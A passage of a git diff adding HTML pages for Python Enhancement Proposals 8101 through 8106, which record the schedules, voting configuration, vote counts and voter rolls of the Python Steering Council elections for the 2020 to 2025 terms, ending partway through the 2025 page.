+Walter Dörwald
+Xiang Zhang
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8100.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8101/index.html b/pep-8101/index.html new file mode 100644 index 00000000000..0023ef86cdc --- /dev/null +++ b/pep-8101/index.html @@ -0,0 +1,400 @@ + + + + + + + + PEP 8101 – 2020 Term Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8101 – 2020 Term Steering Council election

+
+
Author:
+
Ewa Jodlowska <ewa at python.org>, Ee Durbin <ee at python.org>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
16-Nov-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the December +2019 election for the Python steering council, as specified in +PEP 13. This is steering council election for the 2020 term.

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, to implement the election, +and Python Software Foundation +Executive Director, Ewa Jodlowska, to communicate announcements +regarding the election.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 1, 2019 through November 16, 2019 12:00 UTC +(The end of November 15, 2019 Anywhere on Earth). As announced on python-committers, +and took place on discuss.python.org.

+

The voting period is: December 1, 2019 12:00 UTC through December 16, 2019 +12:00 UTC (The end of December 15, 2019 Anywhere on Earth).

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order):

+ +

Withdrawn nominations:

+ +
+
+

Voter Roll

+

All active Python core team members are eligible to vote.

+

Ballots will be distributed based on the The Python Voter Roll for this +election +[1].

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name is available.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2020-python-steering-council

+

Name: 2020 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2020 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: ee@python.org

+

Voting starts at: December 1, 2019 12:00 UTC

+

Voting ends at: December 16, 2019 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 82 eligible voters, 63 cast ballots.

+

The top five vote-getters are:

+
    +
  • Barry Warsaw
  • +
  • Brett Cannon
  • +
  • Carol Willing
  • +
  • Thomas Wouters
  • +
  • Victor Stinner
  • +
+

No conflict of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Brett Cannon54
Carol Willing54
Barry Warsaw50
Thomas Wouters40
Victor Stinner38
Christian Heimes37
Pablo Galindo Salgado37
Gregory P. Smith32
Kushal Das30
+
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Abhilash Raj
+Alex Gaynor
+Alex Martelli
+Alexander Belopolsky
+Andrew Kuchling
+Andrew Svetlov
+Antoine Pitrou
+Barry Warsaw
+Benjamin Peterson
+Berker Peksağ
+Brett Cannon
+Brian Curtin
+Brian Quinlan
+Carol Willing
+Cheryl Sabella
+Chris Withers
+Christian Heimes
+Christian Tismer
+Davin Potts
+Dino Viehland
+Donald Stufft
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Fred Drake
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Inada Naoki
+Ivan Levkivskyi
+Jason R. Coombs
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Kurt B. Kaiser
+Kushal Das
+Larry Hastings
+Lisa Roach
+Łukasz Langa
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Shannon
+Matthias Klose
+Michael Foord
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+R. David Murray
+Raymond Hettinger
+Robert Collins
+Ronald Oussoren
+Senthil Kumaran
+Serhiy Storchaka
+Skip Montanaro
+Stefan Behnel
+Stefan Krah
+Steve Dower
+Steven D'Aprano
+Stéphane Wirtel
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Walter Dörwald
+Xavier de Gaye
+Xiang Zhang
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8101.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8102/index.html b/pep-8102/index.html new file mode 100644 index 00000000000..c230890ce44 --- /dev/null +++ b/pep-8102/index.html @@ -0,0 +1,417 @@ + + + + + + + + PEP 8102 – 2021 Term Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8102 – 2021 Term Steering Council election

+
+
Author:
+
Ewa Jodlowska <ewa at python.org>, Ee Durbin <ee at python.org>, Joe Carey <joe at python.org>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
29-Oct-2020
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the December +2020 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2021 term.

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, +and Accounting Manager, Joe Carey, to coadminister the election.

+

Python Software Foundation +Executive Director, Ewa Jodlowska, will communicate announcements +regarding the election.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 1, 2020 through November 16, 2020 12:00 UTC +(The end of November 15, 2020 Anywhere on Earth). As announced on python-committers, +and took place on discuss.python.org.

+

The voting period is: December 1, 2020 12:00 UTC through December 16, 2020 +12:00 UTC (The end of December 15, 2020 Anywhere on Earth).

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters [1].

+

Ballots will be distributed based on the The Python Voter Roll for this +election +[1].

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name will be made available when the roll is +created.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2021-python-steering-council

+

Name: 2021 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2021 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: December 1, 2020 00:00 UTC

+

Voting ends at: December 16, 2020 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 91 eligible voters, 74 cast ballots.

+

The top five vote-getters are:

+
    +
  • Barry Warsaw
  • +
  • Brett Cannon
  • +
  • Carol Willing
  • +
  • Pablo Galindo Salgado
  • +
  • Thomas Wouters
  • +
+

No conflict of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Pablo Galindo Salgado59
Carol Willing57
Barry Warsaw56
Brett Cannon54
Thomas Wouters52
Christian Heimes43
Mariatta42
Raymond Hettinger31
David Mertz28
Matt Harrison15
+
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Abhilash Raj
+Alex Gaynor
+Alex Martelli
+Alexander Belopolsky
+Andrew Kuchling
+Andrew Svetlov
+Antoine Pitrou
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+Brian Quinlan
+Carol Willing
+Cheryl Sabella
+Chris Jerdonek
+Chris Withers
+Christian Heimes
+Christian Tismer
+Davin Potts
+Dino Viehland
+Donald Stufft
+Dong-hee Na
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Fred Drake
+Georg Brandl
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hynek Schlawack
+Inada Naoki
+Ivan Levkivskyi
+Jack Jansen
+Jason R. Coombs
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Kurt B. Kaiser
+Kushal Das
+Kyle Stanley
+Larry Hastings
+Lisa Roach
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Hammond
+Mark Shannon
+Matthias Klose
+Michael Foord
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+R. David Murray
+Raymond Hettinger
+Robert Collins
+Ronald Oussoren
+Sandro Tosi
+Senthil Kumaran
+Serhiy Storchaka
+Stefan Behnel
+Steve Dower
+Steven D'Aprano
+Stéphane Wirtel
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Walter Dörwald
+Xiang Zhang
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8102.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8103/index.html b/pep-8103/index.html new file mode 100644 index 00000000000..ffac169ea3a --- /dev/null +++ b/pep-8103/index.html @@ -0,0 +1,400 @@ + + + + + + + + PEP 8103 – 2022 Term Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8103 – 2022 Term Steering Council election

+
+
Author:
+
Ewa Jodlowska <ewa at python.org>, Ee Durbin <ee at python.org>, Joe Carey <joe at python.org>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
04-Oct-2021
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the December +2021 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2022 term +(i.e. Python 3.11).

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin +and Accounting Manager, Joe Carey, to coadminister the election.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 1, 2021 through November 16, 2021 12:00 UTC +(The end of November 15, 2021 Anywhere on Earth). As announced on python-committers, +and took place on discuss.python.org.

+

The voting period is: December 1, 2021 12:00 UTC through December 16, 2021 +12:00 UTC (The end of December 15, 2021 Anywhere on Earth).

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters [1].

+

Ballots will be distributed based on the The Python Voter Roll for this +election +[1].

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name will be made available when the roll is +created.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2022-python-steering-council

+

Name: 2022 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2022 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: December 1, 2021 00:00 UTC

+

Voting ends at: December 16, 2021 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 85 eligible voters, 67 cast ballots.

+

The top five vote-getters are:

+
    +
  • Pablo Galindo Salgado
  • +
  • Petr Viktorin
  • +
  • Thomas Wouters
  • +
  • Gregory P. Smith
  • +
  • Brett Cannon
  • +
+

No conflict of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Pablo Galindo Salgado61
Petr Viktorin48
Thomas Wouters48
Gregory P. Smith44
Brett Cannon42
Barry Warsaw39
Victor Stinner35
Mariatta34
Dong-hee Na26
David Mertz24
+
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Abhilash Raj
+Alex Gaynor
+Ammar Askar
+Andrew Kuchling
+Andrew Svetlov
+Antoine Pitrou
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+Brian Quinlan
+Carol Willing
+Cheryl Sabella
+Chris Jerdonek
+Chris Withers
+Christian Heimes
+Dino Viehland
+Dong-hee Na
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Ethan Furman
+Facundo Batista
+Fred Drake
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hynek Schlawack
+Inada Naoki
+Irit Katriel
+Ivan Levkivskyi
+Jason R. Coombs
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Ken Jin
+Kushal Das
+Kyle Stanley
+Larry Hastings
+Lisa Roach
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Shannon
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+Raymond Hettinger
+Ronald Oussoren
+Senthil Kumaran
+Serhiy Storchaka
+Stefan Behnel
+Stéphane Wirtel
+Steve Dower
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Xiang Zhang
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8103.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8104/index.html b/pep-8104/index.html new file mode 100644 index 00000000000..3356370f73f --- /dev/null +++ b/pep-8104/index.html @@ -0,0 +1,400 @@ + + + + + + + + PEP 8104 – 2023 Term Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8104 – 2023 Term Steering Council election

+
+
Author:
+
Ee Durbin <ee at python.org>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
08-Nov-2022
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the December +2022 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2023 term +(i.e. Python 3.12).

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, to administer the election.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 14, 2022 through November 28, 2022 AoE [2].

+

The voting period was: December 1, 2022 through December 14, 2022 AoE [2].

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters +[1].

+

Ballots will be distributed based on the the Python Voter Roll [1] +for this election.

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name will be made available when the roll is +created.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2023-python-steering-council

+

Name: 2023 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2023 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: December 1, 2022 12:00 UTC

+

Voting ends at: December 15, 2022 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 85 eligible voters, 66 cast ballots.

+

The top five vote-getters are:

+
    +
  • Pablo Galindo Salgado
  • +
  • Gregory P. Smith
  • +
  • Emily Morehouse
  • +
  • Brett Cannon
  • +
  • Thomas Wouters
  • +
+

No conflict of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Pablo Galindo Salgado61
Gregory P. Smith48
Emily Morehouse47
Brett Cannon42
Thomas Wouters39
Petr Viktorin36
Victor Stinner34
Dong-hee Na29
+
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Alex Gaynor
+Alex Waygood
+Ammar Askar
+Andrew Svetlov
+Antoine Pitrou
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+Brian Quinlan
+Carol Willing
+Cheryl Sabella
+Chris Jerdonek
+Chris Withers
+Christian Heimes
+Dennis Sweeney
+Dino Viehland
+Dong-hee Na
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Erlend Egeberg Aasland
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Filipe Laíns
+Fred Drake
+Georg Brandl
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hugo van Kemenade
+Hynek Schlawack
+Inada Naoki
+Irit Katriel
+Ivan Levkivskyi
+Jason R. Coombs
+Jelle Zijlstra
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Ken Jin
+Kumar Aditya
+Kurt B. Kaiser
+Kushal Das
+Kyle Stanley
+Larry Hastings
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Shannon
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+R. David Murray
+Raymond Hettinger
+Ronald Oussoren
+Senthil Kumaran
+Serhiy Storchaka
+Stefan Behnel
+Stéphane Wirtel
+Steve Dower
+Steven D'Aprano
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8104.rst

+

Last modified: 2024-06-01 20:32:02 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8105/index.html b/pep-8105/index.html new file mode 100644 index 00000000000..6ffec51fc53 --- /dev/null +++ b/pep-8105/index.html @@ -0,0 +1,527 @@ + + + + + + + + PEP 8105 – 2024 Term Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8105 – 2024 Term Steering Council election

+
+
Author:
+
Ee Durbin <ee at python.org>
+
Sponsor:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
23-Oct-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the +2023 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2024 term +(i.e. Python 3.13).

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, to administer the election.

+
+
+

Schedule

+

There was a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 9, 2023 through November 22, 2023 AoE [2].

+

The voting period was: November 27, 2023 through December 11, 2023 AoE [2].

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order by first name):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters +[1].

+

Ballots were be distributed based on the the Python Voter Roll [1] +for this election.

+

While this file is not public as it contains private email addresses, +the Complete Voter Roll is available with a list of all eligible voters by name.

+
+
+

Election Implementation

+

The election was be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2024-python-steering-council

+

Name: 2024 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2024 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: November 27, 2023 12:00 UTC

+

Voting ends at: December 11, 2023 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Extended Election Implementation

+

Due to a mismatch between announced timeline and the initial election implementation +an extended election is held to provide the additional day for voters who were disenfranchised +by the initial election.

+

Results from the initial election were combined with the results from the extended election. +Only voters who DID NOT cast ballots in the initial election were able to vote.

+

The election was be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2024-python-steering-council-extension

+

Name: 2024 Python Steering Council Election Extension

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2024 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: December 11, 2023 12:00 UTC

+

Voting ends at: December 12, 2023 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 87 eligible voters, 68 cast ballots.

+

The top five vote-getters are:

+
    +
  • Pablo Galindo Salgado
  • +
  • Gregory P. Smith
  • +
  • Barry Warsaw
  • +
  • Emily Morehouse
  • +
  • Thomas Wouters
  • +
+

No conflict of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+

Initial Election

+

56 of 87 eligible voters cast ballots.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Barry Warsaw35
Donghee Na27
Emily Morehouse38
Gregory P. Smith42
Mariatta25
Pablo Galindo Salgado48
Thomas Wouters30
Victor Stinner27
+

Election Extension

+

12 of 31 eligible voters disenfranchised in the initial election cast ballots.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Barry Warsaw8
Donghee Na5
Emily Morehouse8
Gregory P. Smith10
Mariatta5
Pablo Galindo Salgado12
Thomas Wouters10
Victor Stinner8
+

Combined

+

68 of 87 eligible voters cast ballots

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Barry Warsaw43
Donghee Na32
Emily Morehouse46
Gregory P. Smith52
Mariatta30
Pablo Galindo Salgado60
Thomas Wouters40
Victor Stinner35
+
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Adam Turner
+Alex Gaynor
+Alex Waygood
+Alexander Belopolsky
+Alyssa Coghlan
+Ammar Askar
+Andrew Svetlov
+Antoine Pitrou
+Barney Gale
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
+Brett Cannon
+Brian Curtin
+C.A.M. Gerlach
+Carl Friedrich Bolz-Tereick
+Carl Meyer
+Carol Willing
+Cheryl Sabella
+Chris Withers
+Christian Heimes
+Dennis Sweeney
+Dino Viehland
+Donghee Na
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Erlend Egeberg Aasland
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Filipe Laíns
+Georg Brandl
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Hugo van Kemenade
+Hynek Schlawack
+Inada Naoki
+Irit Katriel
+Ivan Levkivskyi
+Jason R. Coombs
+Jelle Zijlstra
+Jeremy Kloth
+Joannah Nanjekye
+Julien Palard
+Karthikeyan Singaravelan
+Ken Jin
+Kumar Aditya
+Kurt B. Kaiser
+Kushal Das
+Larry Hastings
+Łukasz Langa
+Lysandros Nikolaou
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Shannon
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+Pradyun Gedam
+R. David Murray
+Raymond Hettinger
+Ronald Oussoren
+Senthil Kumaran
+Serhiy Storchaka
+Shantanu Jain
+Stefan Behnel
+Stéphane Wirtel
+Steve Dower
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8105.rst

+

Last modified: 2024-06-01 20:32:02 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8106/index.html b/pep-8106/index.html new file mode 100644 index 00000000000..6273a8a9296 --- /dev/null +++ b/pep-8106/index.html @@ -0,0 +1,414 @@ + + + + + + + + PEP 8106 – 2025 Term Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8106 – 2025 Term Steering Council election

+
+
Author:
+
Ee Durbin <ee at python.org>
+
Sponsor:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
21-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the +2024 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2025 term +(i.e. Python 3.14).

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, to administer the election.

+
+
+

Schedule

+

There was a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 7, 2024 through November 21, 2024 AoE [2].

+

The voting period was: November 25, 2024 through December 9, 2024 AoE [2].

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order by first name):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters +[1].

+

Ballots were distributed based on the the Python Voter Roll [1] +for this election.

+

